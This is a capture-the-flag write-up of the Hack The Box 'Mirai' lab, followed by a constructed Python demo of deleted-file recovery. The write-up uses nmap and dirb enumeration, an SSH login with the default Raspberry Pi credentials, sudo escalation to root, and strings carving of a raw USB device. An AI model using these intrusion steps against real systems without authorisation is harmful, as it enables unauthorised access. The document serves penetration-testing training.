Today we are going to solve another CTF challenge, “Mirai”, a lab presented by Hack the Box for online penetration-testing practice at any experience level. They have a collection of vulnerable labs as challenges, from beginner to expert level. HTB has two partitions of labs, Active and Retired; since we can’t submit a write-up of any Active lab, we have chosen the retired Mirai lab.
Level: Easy
Task: find user.txt and root.txt file in the victim’s machine.
Lab IP: 10.10.10.48
First, let’s enumerate the victim machine’s open ports and the services running on them using the most popular tool, Nmap.
root@kali:~/htb/mirai# nmap -sC -sV -oA nmap 10.10.10.48
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-23 20:16 CET
Nmap scan report for 10.10.10.48
Host is up (0.026s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.68 seconds
Without wasting time I used the dirb tool in Kali to enumerate directories and found some important ones, such as /admin/.
root@kali:~/htb/mirai# dirb http://10.10.10.48

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Feb 23 20:16:56 2019
URL_BASE: http://10.10.10.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.48/ ----
==> DIRECTORY: http://10.10.10.48/admin/
When I clicked on the login tab I saw the following web page. The Pi-hole and the logo give a pretty big hint that the target machine is a Raspberry Pi, and the Raspberry Pi comes with a default SSH login.
So we tried default ssh credentials on the Raspberry Pi.
Username: pi Password: raspberry
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\jacco> ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 21 00:00:59 2019 from 10.10.14.5

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
pi@raspberrypi:~ $ cd Desktop
pi@raspberrypi:~/Desktop $ ls
Plex  user.txt
pi@raspberrypi:~/Desktop $ cat user.txt
ff8*****38dpi
Then I moved on to root access using the same password, and again got root access successfully.
pi@raspberrypi:~/Desktop $ sudo bash
root@raspberrypi:/home/pi/Desktop# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
root@raspberrypi:/home/pi/Desktop#
Let’s check whether the USB stick is mounted with the df command.
pi@raspberrypi:~ $ df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  35% /
tmpfs           101M  8.8M   92M   9% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           251M     0  251M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  35% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           251M  8.0K  251M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           251M     0  251M   0% /sys/fs/cgroup
tmpfs           251M  4.0K  251M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            51M     0   51M   0% /run/user/999
tmpfs            51M     0   51M   0% /run/user/1000
pi@raspberrypi:~ $
From the df output above we can see the USB stick (/dev/sdb) mounted at /media/usbstick.
Then execute the following commands to look at its contents.
root@raspberrypi:/home/pi/Desktop# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back?
-James
Move back to the pi home directory and run the following command against the raw USB device. Deleting a file only unlinks its name; the data blocks are still on the disk until they are overwritten, so strings can pull the old contents straight out of /dev/sdb.
pi@raspberrypi:~ $ sudo strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3*****20b
Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back?
-James
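As an added example, not part of the original write-up, a Python model of why the recovery above works and what would have prevented it: a constructed 8 KiB ext2-style image, an rm that only drops the directory entry, a minimal strings carver, and the block wipe that makes the data unrecoverable. The block layout, file names and the flag placeholder are constructed for the demo.

```python
import re

BLOCK = 1024  # ext2-style 1 KiB blocks, like the tiny stick seen on the box

def make_image():
    """Constructed 8-block 'USB stick': block 1 is a fake directory listing,
    blocks 2 and 3 hold file contents. Real ext2 metadata is omitted."""
    img = bytearray(BLOCK * 8)
    names = b"lost+found\x00root.txt\x00damnit.txt\x00"
    img[BLOCK:BLOCK + len(names)] = names
    root_txt = b"3d3*****20b\n"  # constructed placeholder, not a real flag
    img[2 * BLOCK:2 * BLOCK + len(root_txt)] = root_txt
    note = b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n-James\n"
    img[3 * BLOCK:3 * BLOCK + len(note)] = note
    return img

def delete_file(img, name):
    """Unlink the way rm does on ext2: the name leaves the directory block,
    the data blocks are merely marked free and keep their bytes."""
    names = bytes(img[BLOCK:2 * BLOCK]).replace(name.encode() + b"\x00", b"")
    img[BLOCK:2 * BLOCK] = names.ljust(BLOCK, b"\x00")

def wipe_block(img, index):
    """Overwrite one block with zeros, what shred or dd if=/dev/zero would do."""
    img[index * BLOCK:(index + 1) * BLOCK] = bytes(BLOCK)

def carve_strings(img, min_len=4):
    """Minimal `strings`: (offset, text) for printable ASCII runs of >= min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [(m.start(), m.group().decode()) for m in re.finditer(pattern, bytes(img))]

def recoverable(img, token):
    """True if token can still be carved from the raw image, directory entry or not."""
    return any(token in text for _, text in carve_strings(img))

if __name__ == "__main__":
    img = make_image()
    delete_file(img, "root.txt")
    print("after rm:  ", recoverable(img, "3d3*****20b"))  # True: only the name is gone
    wipe_block(img, 2)
    print("after wipe:", recoverable(img, "3d3*****20b"))  # False: the bytes are gone
```

The same distinction is why a defender disposes of removable media with a full overwrite rather than rm, and why a forensic examiner images the raw device, not the mounted filesystem.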
Author: Jacco Straathof